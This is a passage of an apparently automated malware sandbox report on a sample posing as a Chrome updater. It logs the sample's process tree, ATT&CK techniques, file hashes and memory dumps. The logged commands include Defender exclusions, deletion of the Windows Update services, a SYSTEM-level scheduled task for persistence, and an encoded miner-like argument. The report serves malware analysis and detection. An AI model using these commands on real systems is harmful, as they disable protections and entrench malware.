powershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4308

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
3⤵
PID:2832

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1608

C:\Windows\system32\cmd.exe
cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:4556

C:\Windows\system32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3952

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:3932

C:\Windows\system32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4056

C:\Windows\system32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3732

C:\Windows\system32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2036

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:384

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:4788

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1884

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1860

C:\Windows\system32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4104

C:\Windows\system32\cmd.exe
cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
- Suspicious use of WriteProcessMemory
PID:3620

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:4668

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:3216

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4756

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:328

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe lhmcarocyjvzk
2⤵
PID:1204

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
3⤵
- Drops file in Program Files directory
PID:2292

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
4⤵
PID:4644

C:\Windows\system32\cmd.exe
cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1352

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
0b1c9cde6b467847472545263c58791c

SHA1
3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8

SHA256
394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14

SHA512
276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02

Download Submit
C:\Program Files\Google\Chrome\updater.exe
Filesize
7.0MB

MD5
0b1c9cde6b467847472545263c58791c

SHA1
3acaf0cefda3ab7e43c18a8eb17ec69477cc36a8

SHA256
394ccb1ddb7208fb72d9f0a277c13202f9f2843652287eaa7355d83d88170f14

SHA512
276f7effb5ec82d444aadcea8523916d6dcc76a63826bc24fa3f7ee2b2f5cc5d3994d7747aaa44b17c67d475dca41c90533e166d187e890a76bd144e0f8e0c02

Download Submit
C:\Program Files\Google\Libs\g.log
Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
42cc9ff3509672894beabcd392a00c43

SHA1
c12dc74a6c8a8e1f8f4033d31495ebb09d70e9ab

SHA256
352d90b619218e7bf297219c1468e9ea487c9002e28984ec70a963088dff3579

SHA512
c876de012d1b237463b2c2a4195e050c2ddbdf5725aa2553313525ecb6a4a3f0cda9a289f257b886395da6407b5173451e95df89665ae1c727c6be3753a89271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5b9a7ee9a9286faef39bbe9cac042fd4

SHA1
cb3ef3c9e19781c45ffd9e2902e5b0ed38c0e2c3

SHA256
a6d5d07c333b6a68534ebc0ee23ea49e77a67f26597e4bd5bcc8dfd216e6a348

SHA512
ea14a4932134952864bd1b0ccdfd6ad45ed650a9bc52589f6d21fc4382a6237c6bbce1c016482b4a68cd609dadea234726927ba0f26e9443a6b970209281f450

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
a4cd5d67933e16688a3bdc40a460e219

SHA1
410208cf3e0c4ea90ff9818de7d80d6519a0aded

SHA256
1b2e3823aad14c9b2042da68a89c52c5d81382d4cc1db16bcdd0a13e71aef14a

SHA512
36f5effd3df63e0ea42a5328f53102ce1d38ca36da9fe326450bc488dd42c48063a738434ff4eabfd1223a55c53a8be067f6a1a76989cb52047c10a1eba2b1b5

Download Submit
memory/216-151-0x0000000000000000-mapping.dmp

Download
memory/224-152-0x0000000000000000-mapping.dmp

Download
memory/328-208-0x0000000000000000-mapping.dmp

Download
memory/384-210-0x0000000000000000-mapping.dmp

Download
memory/524-153-0x0000000000000000-mapping.dmp

Download
memory/776-162-0x0000000000000000-mapping.dmp

Download
memory/1204-217-0x00007FF7119C14E0-mapping.dmp

Download
memory/1320-155-0x0000000000000000-mapping.dmp

Download
memory/1352-219-0x0000000000000000-mapping.dmp

Download
memory/1608-188-0x000002209B0C0000-0x000002209B0CA000-memory.dmp

Filesize
40KB

Download
memory/1608-183-0x0000000000000000-mapping.dmp

Download
memory/1608-193-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmp

Filesize
10.8MB

Download
memory/1608-192-0x000002209DF40000-0x000002209DF4A000-memory.dmp

Filesize
40KB

Download
memory/1608-186-0x000002209B0B0000-0x000002209B0BA000-memory.dmp

Filesize
40KB

Download
memory/1608-187-0x000002209DF10000-0x000002209DF2C000-memory.dmp

Filesize
112KB

Download
memory/1608-184-0x000002209B090000-0x000002209B0AC000-memory.dmp

Filesize
112KB

Download
memory/1608-185-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmp

Filesize
10.8MB

Download
memory/1608-189-0x000002209DF50000-0x000002209DF6A000-memory.dmp

Filesize
104KB

Download
memory/1608-191-0x000002209DF30000-0x000002209DF36000-memory.dmp

Filesize
24KB

Download
memory/1608-190-0x000002209B0D0000-0x000002209B0D8000-memory.dmp

Filesize
32KB

Download
memory/1640-146-0x0000000000000000-mapping.dmp

Download
memory/1860-213-0x0000000000000000-mapping.dmp

Download
memory/1884-212-0x0000000000000000-mapping.dmp

Download
memory/1996-145-0x0000000000000000-mapping.dmp

Download
memory/2036-209-0x0000000000000000-mapping.dmp

Download
memory/2288-164-0x0000000000000000-mapping.dmp

Download
memory/2292-218-0x0000000000000000-mapping.dmp

Download
memory/2548-181-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-224-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/2548-180-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-182-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/2548-223-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-173-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-174-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/2548-175-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-176-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-177-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-178-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2548-179-0x00007FF69E7E0000-0x00007FF69F48B000-memory.dmp

Filesize
12.7MB

Download
memory/2736-150-0x0000000000000000-mapping.dmp

Download
memory/2832-170-0x0000000000000000-mapping.dmp

Download
memory/3044-163-0x0000000000000000-mapping.dmp

Download
memory/3216-203-0x0000000000000000-mapping.dmp

Download
memory/3420-132-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-168-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-139-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/3420-135-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-133-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-140-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-138-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-137-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-136-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3420-167-0x00007FFA20630000-0x00007FFA20825000-memory.dmp

Filesize
2.0MB

Download
memory/3420-134-0x00007FF72E780000-0x00007FF72F42B000-memory.dmp

Filesize
12.7MB

Download
memory/3428-158-0x0000000000000000-mapping.dmp

Download
memory/3436-157-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmp

Filesize
10.8MB

Download
memory/3436-147-0x0000000000000000-mapping.dmp

Download
memory/3436-165-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmp

Filesize
10.8MB

Download
memory/3484-144-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmp

Filesize
10.8MB

Download
memory/3484-143-0x00007FFA024D0000-0x00007FFA02F91000-memory.dmp

Filesize
10.8MB

Download
memory/3484-141-0x0000000000000000-mapping.dmp

Download
memory/3484-142-0x000001B1C20B0000-0x000001B1C20D2000-memory.dmp

Filesize
136KB

Download
memory/3620-195-0x0000000000000000-mapping.dmp

Download
memory/3656-148-0x0000000000000000-mapping.dmp

Download
memory/3672-161-0x0000000000000000-mapping.dmp

Download
memory/3676-159-0x0000000000000000-mapping.dmp

Download
memory/3732-206-0x0000000000000000-mapping.dmp

Download
memory/3848-156-0x0000000000000000-mapping.dmp

Download
memory/3932-202-0x0000000000000000-mapping.dmp

Download
memory/3952-201-0x0000000000000000-mapping.dmp

Download
memory/4056-204-0x0000000000000000-mapping.dmp

Download
memory/4104-216-0x000001A1A0EF9000-0x000001A1A0EFF000-memory.dmp

Filesize
24KB

Download
memory/4104-207-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmp

Filesize
10.8MB

Download
memory/4104-215-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmp

Filesize
10.8MB

Download
memory/4104-197-0x0000000000000000-mapping.dmp

Download
memory/4308-166-0x0000000000000000-mapping.dmp

Download
memory/4308-171-0x00007FFA025F0000-0x00007FFA030B1000-memory.dmp

Filesize
10.8MB

Download
memory/4556-194-0x0000000000000000-mapping.dmp

Download
memory/4572-160-0x0000000000000000-mapping.dmp

Download
memory/4644-220-0x0000000000000000-mapping.dmp

Download
memory/4668-199-0x0000000000000000-mapping.dmp

Download
memory/4756-205-0x0000000000000000-mapping.dmp

Download
memory/4788-211-0x0000000000000000-mapping.dmp

Download
memory/4924-214-0x0000000000000000-mapping.dmp

Download
memory/5060-222-0x0000024F8A1D0000-0x0000024F8A1F0000-memory.dmp

Filesize
128KB

Download
memory/5060-221-0x00007FF7748325D0-mapping.dmp

Download
memory/5060-227-0x00007FF774040000-0x00007FF774834000-memory.dmp

Filesize
8.0MB

Download
memory/5060-228-0x00007FF774040000-0x00007FF774834000-memory.dmp

Filesize
8.0MB

Download